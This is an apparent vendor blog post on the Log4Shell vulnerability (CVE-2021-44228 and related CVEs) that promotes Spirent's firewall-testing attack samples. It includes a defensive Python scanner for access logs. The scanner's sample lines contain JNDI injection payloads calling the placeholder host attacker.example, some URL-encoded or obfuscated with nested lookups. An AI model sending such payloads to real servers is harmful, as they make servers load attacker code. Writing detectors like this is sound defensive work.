
Log4j: Top-Rated Vulnerability Impacts the Entire Internet


On December 9, 2021, a vulnerability of the highest possible severity was discovered, and the entire security industry is racing to fix it. Read on for details of the impact and how Spirent helps users protect against this latest top-rated vulnerability.

This issue, known as the Log4j vulnerability (also called "Log4Shell"), was assigned CVE-2021-44228 on December 10. Log4j is a popular open-source Java logging library, used directly or indirectly by one-third of servers on the Internet. Known affected high-profile servers and services include Apache web servers, Apple iCloud, Twitter, Amazon, Microsoft, IBM, Oracle, Cisco, Google, Cloudflare, Minecraft game servers and many other services and content providers.

This vulnerability received a CVSS score of 10.0, the highest possible rating, because it is simple to exploit and has a critical impact on many servers. An attacker simply sends a malicious string that is eventually logged by Log4j version 2.0 or higher. The exploit lets the attacker load arbitrary Java code on the server, allowing them to take control of the compromised system. This behavior is commonly known as Remote Command/Code Execution (RCE). Log4j 2.0 was released in July 2014 and has been downloaded over 400,000 times; consider how many software applications are using this library.

The Log4j developers released 2.15 to address CVE-2021-44228. However, that fix introduced two new problems, tracked as CVE-2021-45046 (December 14) and CVE-2021-45105 (December 18). These were first addressed in 2.16.0 and further fixed in 2.17.0, and more updates are expected.

What’s next?

Many attackers are racing to use this powerful weapon. They have developed automated tools to scan the Internet for vulnerable hosts and exploit them, and have added new capabilities to their APT toolsets.

On the other hand, application developers are racing to upgrade their solutions to the latest version of Log4j. However, it is not always possible to upgrade and patch the code, and doing so takes time. In those instances, IT organizations will need to place security controls such as an NGFW, IPS or WAF in front of the vulnerable servers to block the attacks before they get into the network.

Protecting users against vulnerabilities

To help users protect against this latest top-rated vulnerability, Spirent CyberFlood includes attack samples for both CVE-2021-44228 and CVE-2021-45046 in the latest TestCloud update. These samples are available to current CyberFlood customers; CVE-2021-45105 will be available very soon.

Example of CyberFlood CyberThreat Assessment (CTA) call-flow between the hosts in the Log4j attack CVE-2021-44228

CIOs and IT departments can run these attacks against their NGFW or WAF to validate whether their security infrastructure is updated to protect against Log4j threats:

  • If security devices cannot detect and alert on these two attacks, either contact your security vendors to upgrade to the latest threat intelligence, or check your web access logs to determine whether you have been attacked, whether any data has been leaked outside, or whether backdoor software has been planted

  • If security devices can detect and alert on these attacks, refer to our previous post to enable HTTPS and common evasions, and test again
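The access-log check in the first bullet is easy to get wrong with a plain string match, because the lookup string is often URL-encoded or wrapped in nested Log4j lookups. The Python script below is an added example (not Spirent's code or part of the CyberFlood product) that normalizes those forms before searching for the JNDI lookup marker and reports the client address and URI scheme for each hit. The log lines are constructed samples in combined log format, and the host name attacker.example is a placeholder.

```python
import re
import urllib.parse
from typing import Dict, List, Optional

# Constructed sample web access log lines (combined log format). These are
# not real traffic; "attacker.example" is a placeholder host name.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:10:15:32 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:16:01 +0000] "GET /login HTTP/1.1" 200 233 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:16:05 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.12 - - [10/Dec/2021:10:17:44 +0000] "GET /api HTTP/1.1" 200 99 "-" "${${lower:j}${upper:n}di:ldap://attacker.example/c}"',
    '10.0.0.7 - - [10/Dec/2021:10:18:00 +0000] "POST /submit HTTP/1.1" 200 10 "-" "${jndi:dns://attacker.example/d}"',
]

# ${lower:x} / ${upper:x} wrappers around one fragment. The innermost wrapper
# contains no further "${", so repeated substitution unwraps nested forms;
# letter case is irrelevant because the final marker search ignores case.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# Default-value syntax such as ${::-j} or ${env:NOSUCH:-j} evaluates to "j".
DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The JNDI lookup marker after normalization, capturing the URI scheme.
JNDI_MARKER = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize(text: str, rounds: int = 5) -> str:
    """URL-decode and unwrap lookup obfuscations until the text stops changing."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(text)
        decoded = CASE_LOOKUP.sub(lambda m: m.group(1), decoded)
        decoded = DEFAULT_VALUE.sub(lambda m: m.group(1), decoded)
        if decoded == text:
            break
        text = decoded
    return text


def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return a hit record if the line carries a JNDI lookup, otherwise None."""
    normalized = normalize(line)
    match = JNDI_MARKER.search(normalized)
    if match is None:
        return None
    return {
        "client": line.split(" ", 1)[0],   # first field of the combined format
        "scheme": match.group(1).lower(),  # ldap, rmi, dns, ...
        "normalized": normalized,
    }


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan every line and collect the hits in log order."""
    hits = []
    for line in lines:
        hit = scan_line(line)
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"{hit['client']}: JNDI lookup via {hit['scheme']} -> {hit['normalized']}")
```

Run it against a real access log by replacing SAMPLE_LOG_LINES with the file's lines; a hit only proves that a lookup string reached the web tier, so the next step is to confirm from the application's own logs whether the string was passed to a vulnerable Log4j version, and whether the server made an outbound LDAP, RMI or DNS connection to the named host.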

The Log4j vulnerability impacts one-third of servers on the Internet, and not all companies can upgrade their systems to the latest version to fix the issue promptly.

Spirent helps organizations verify their security controls and devices, whether physical appliances on-premises or virtual instances in a public cloud. All existing customers can access these new CVEs through TestCloud.

Contact us today to speak with a security expert on best ways to address this latest top-rated vulnerability.


Hongbo Ren

Business Development Manager, East Asia

Hongbo is Business Development Manager at Spirent with responsibility for East Asia Cloud and Security business development. He has over 20 years of experience in network security, cloud, application, and telecommunication technologies and a proven track record delivering cutting-edge applications and security testing solutions for Network Equipment Manufacturers, Enterprises, and Services Providers.